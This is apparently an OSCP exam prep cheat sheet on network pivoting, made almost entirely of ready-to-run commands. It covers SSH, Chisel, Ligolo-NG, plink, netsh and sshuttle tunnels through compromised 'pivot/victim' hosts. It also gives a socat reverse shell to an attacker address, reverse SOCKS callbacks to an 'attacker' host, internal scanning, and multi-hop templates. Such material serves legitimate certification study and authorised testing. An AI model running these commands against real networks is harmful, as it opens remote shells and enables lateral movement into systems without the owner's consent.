######################################################################
# 11 – PIVOTING & PORT FORWARDING (OSCP 2025 — FULLY UPGRADED)
######################################################################

This upgraded pivoting module now includes:
✔ SSH dynamic/remote/local tunnels  
✔ Chisel (forward + reverse)  
✔ Ligolo-NG (modern, stable, OSCP-safe)  
✔ Plink.exe Windows SSH tunneling  
✔ netsh portproxy (Windows native pivot)  
✔ SSHuttle (auto-routing without proxychains)  
✔ Rinetd / Socat advanced forwards  
✔ Multi-pivoting templates  
✔ Proxychains best-practice usage  
######################################################################


======================================================================
# 1. SSH PIVOTING (Most Common & Most Stable)
======================================================================

---------------------------------------
# 1.1 Dynamic SOCKS Proxy (BEST METHOD)
---------------------------------------
ssh -D 1080 $user@$pivot

# Use with proxychains:
proxychains nmap -sT -Pn 10.10.2.0/24
proxychains crackmapexec smb 10.10.2.50
proxychains firefox http://10.10.2.20


---------------------------------------
# 1.2 Local Port Forward (YourMachine → Internal)
---------------------------------------
ssh -L 13389:10.10.2.20:3389 $user@$pivot
xfreerdp /v:127.0.0.1:13389


---------------------------------------
# 1.3 Remote Port Forward (Internal → YourMachine)
---------------------------------------
ssh -R 0.0.0.0:8888:127.0.0.1:80 $user@$pivot
# Pivot host now loads your local Kali web server.


---------------------------------------
# 1.4 Reverse SSH Tunnel (when inbound blocked)
---------------------------------------
ssh -R 4444:127.0.0.1:22 attacker@$localip
ssh -p 4444 user@localhost


---------------------------------------
# 1.5 autossh (Persistent Auto-Reconnecting Tunnels)
---------------------------------------
autossh -M 0 -f -N -D 1080 $user@$pivot
autossh -M 0 -f -N -L 8080:internal:80 $user@$pivot


======================================================================
# 2. CHISEL PIVOTING (Extremely Reliable)
======================================================================

---------------------------------------
# 2.1 Chisel Reverse SOCKS Tunnel (Recommended)
---------------------------------------
# On Kali (Server):
chisel server -p 9001 --reverse

# On Pivot/Victim:
chisel client $localip:9001 R:socks

# Use:
proxychains nmap -sT -Pn 10.10.2.0/24


---------------------------------------
# 2.2 Chisel Local Port Forward
---------------------------------------
chisel client $pivotip:9001 8000:127.0.0.1:80


---------------------------------------
# 2.3 Chisel Reverse Port Forward (pivot → kali)
---------------------------------------
chisel client $localip:9001 R:445:127.0.0.1:445


======================================================================
# 3. LIGOLO-NG (Modern BEST Pivot Tool — 2025)
======================================================================

---------------------------------------
# 3.1 Setup on Kali
---------------------------------------
ligolo-ng proxy -listen :11601 -iface tun0

---------------------------------------
# 3.2 On Pivot Host (agent)
---------------------------------------
agent -connect $localip:11601 -ignore-cert

---------------------------------------
# 3.3 Create tunnel interface
---------------------------------------
ip link set ligolo up
ip route add 10.10.2.0/24 dev ligolo

---------------------------------------
# 3.4 Now scan internal network directly
---------------------------------------
nmap -sT 10.10.2.0/24
crackmapexec smb 10.10.2.50


======================================================================
# 4. WINDOWS-NATIVE PIVOTING
======================================================================

---------------------------------------
# 4.1 Plink.exe (Windows SSH tunneling)
---------------------------------------
plink.exe -ssh -D 1080 $user@$localip

plink.exe -ssh -L 13389:10.10.2.20:3389 $user@$localip

plink.exe -ssh -R 8888:127.0.0.1:80 $user@$localip


---------------------------------------
# 4.2 netsh portproxy (Windows port forwarding)
---------------------------------------
# Forward local pivot port → internal host
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.2.20

# Delete
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

# Check
netsh interface portproxy show all


---------------------------------------
# 4.3 Windows SOCKS proxy via 3proxy (optional)
---------------------------------------
3proxy.exe socks -p1080


======================================================================
# 5. SSHUTTLE — AUTO ROUTING (NO PROXYCHAINS)
======================================================================

# Seamless routing through pivot (if SSH credentials work)
sshuttle -r $user@$pivot 10.10.2.0/24

# Now scan internal network normally:
nmap -sT 10.10.2.0/24


======================================================================
# 6. SOCAT & RINETD (Swiss Army Forwarders)
======================================================================

---------------------------------------
# 6.1 Socat Local → Internal Forward
---------------------------------------
socat TCP-LISTEN:8080,fork TCP:10.10.2.50:80


---------------------------------------
# 6.2 Full TTY Reverse Shell (UNSTABLE LABS)
---------------------------------------
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$localip:4444


---------------------------------------
# 6.3 rinetd simple forward (Linux)
---------------------------------------
echo "8080 10.10.2.20 80" >> /etc/rinetd.conf
systemctl restart rinetd


======================================================================
# 7. INTERNAL ENUMERATION ON PIVOT HOSTS
======================================================================

---------------------------------------
# 7.1 Linux Pivot Host
---------------------------------------
ip a
route -n
arp -a
ss -tulnp
fping -a -g 10.10.2.0/24 2>/dev/null
nmap -sT -p- --min-rate 2000 10.10.2.0/24


---------------------------------------
# 7.2 Windows Pivot Host
---------------------------------------
ipconfig /all
arp -a
route print
netstat -ano

# PowerShell ping sweep
powershell -c "1..254 | % { Test-Connection -Quiet 10.10.2.$_ } | Out-Null"

# SMB enumeration from pivot
powershell -c "Get-SmbShare"
powershell -c "Test-NetConnection -Port 445 internalhost"


======================================================================
# 8. DOUBLE / MULTI-PIVOTING TEMPLATES
======================================================================

---------------------------------------
# 8.1 Two-hop pivot (pivot1 → pivot2)
---------------------------------------
ssh -D 1080 user@pivot1
proxychains ssh -D 2080 user@pivot2
proxychains2 nmap -sT 10.10.50.0/24


---------------------------------------
# 8.2 Chisel multi-hop
---------------------------------------
# Pivot1
chisel client attacker:9001 R:socks

# Pivot2 over Proxychains
proxychains chisel client attacker:9001 R:socks


======================================================================
# 9. QUICK PIVOT CHEAT-SHEET
======================================================================

# SOCKS Proxy (General)
ssh -D 1080 user@pivot
chisel client attacker:9001 R:socks
agent (Ligolo-NG)

# Local port → internal
ssh -L localport:internal:port user@pivot

# Reverse port → attacker
ssh -R attackerport:local:port user@pivot

# Windows pivot
plink.exe -L/R/D ...
netsh portproxy add ...

# Auto-routing (no proxychains)
sshuttle -r user@pivot 10.10.2.0/24

# SOCKS with tool forwarding
proxychains crackmapexec smb 10.10.2.x
proxychains nmap -sT -Pn internal/24


######################################################################
# END OF 11_PIVOTING (FULL OSCP 2025 UPGRADE)
######################################################################
